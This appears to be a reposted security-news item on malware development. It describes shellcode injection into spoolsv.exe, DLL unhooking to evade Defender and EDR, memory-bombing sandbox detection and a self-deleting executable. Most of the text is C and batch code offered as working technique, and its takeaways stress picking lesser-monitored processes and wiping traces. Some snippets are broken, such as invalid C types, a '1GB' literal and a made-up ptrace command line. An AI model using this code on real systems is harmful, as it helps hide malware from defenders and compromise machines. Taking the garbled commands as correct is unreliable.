Listen to this Post
Last year, when I was starting out with malware development, I created a “self-deleting” executable that injects shellcode into “OneDrive.exe” using “Process Injection”.
Recently, I wanted to use this in a CTF lab I was practicing on, but now Windows Defender flags it almost immediately. So I incorporated a “DLL unhooking” technique I learned from iRedTeam to bypass Defender.
👉 This time, I am injecting the remote shellcode into “spoolsv.exe” (Windows Print Spooler service), which I found to be more reliable than “svchost.exe” or “winlogon.exe”.
👉 Also, to bypass dynamic analysis, I incorporated a method I learned from John Ford: “memory bombing”, where you try to allocate a large amount of memory and check if the allocation fails. In sandboxed environments, memory allocation limits are usually low.
You Should Know:
1. Process Injection Techniques
- Classic DLL Injection:
HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, targetPID); LPVOID pDllPath = VirtualAllocEx(hProcess, NULL, strlen(dllPath), MEM_COMMIT, PAGE_READWRITE); WriteProcessMemory(hProcess, pDllPath, (LPVOID)dllPath, strlen(dllPath), NULL); HANDLE hThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandle("kernel32"), "LoadLibraryA"), pDllPath, 0, NULL); -
Process Hollowing (GhostProcess):
Replaces the memory of a legitimate process (e.g.,svchost.exe) with malicious code.
2. DLL Unhooking for EDR/AV Evasion
EDRs hook Windows APIs to monitor malicious activity. Unhooking restores original function bytes:
BOOL UnhookDLL(const char libName) {
HMODULE hModule = GetModuleHandleA(libName);
HANDLE hFile = CreateFileA("original_dll.dll", GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL);
LPVOID pFileData = MapViewOfFile(hFile, FILE_MAP_READ, 0, 0, 0);
// Overwrite hooked functions with clean bytes
memcpy((void)hModule, pFileData, 0x1000); // Example: restore first 4KB
CloseHandle(hFile);
return TRUE;
}
3. Memory Bombing for Anti-Sandboxing
Allocate large memory chunks to detect sandboxes:
bool IsSandboxed() {
LPVOID pMem = NULL;
for (int i = 0; i < 10; i++) {
pMem = VirtualAlloc(NULL, 1GB, MEM_COMMIT, PAGE_READWRITE);
if (pMem == NULL) return true; // Likely sandboxed
VirtualFree(pMem, 0, MEM_RELEASE);
}
return false;
}
4. Spoolsv.exe Injection (Reliable Target)
The Print Spooler service (spoolsv.exe) is often overlooked by AV:
Find spoolsv.exe PID: Get-Process spoolsv | Select-Object Id
5. Self-Deleting Executable
Use batch scripting to delete the malware after execution:
@echo off start /B malware.exe del "%~f0"
What Undercode Say:
Process injection and AV evasion are critical in red teaming. Key takeaways:
– Use lesser-monitored processes like spoolsv.exe.
– Restore hooked DLLs to bypass EDRs.
– Detect sandboxes via memory/resource checks.
– Clean traces (self-deletion, log wiping).
Relevant Commands:
- Linux Equivalent (ptrace injection):
gcc -shared -o libinject.so inject.c && sudo ptrace -p $PID -x libinject.so
- Windows API Calls:
NtCreateSection, NtMapViewOfSection // For advanced injection
Expected Output:
A stealthy payload executing in `spoolsv.exe` while evading Defender and EDR hooks.
Reference URLs:
References:
Reported By: Kavishka Fernando – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅



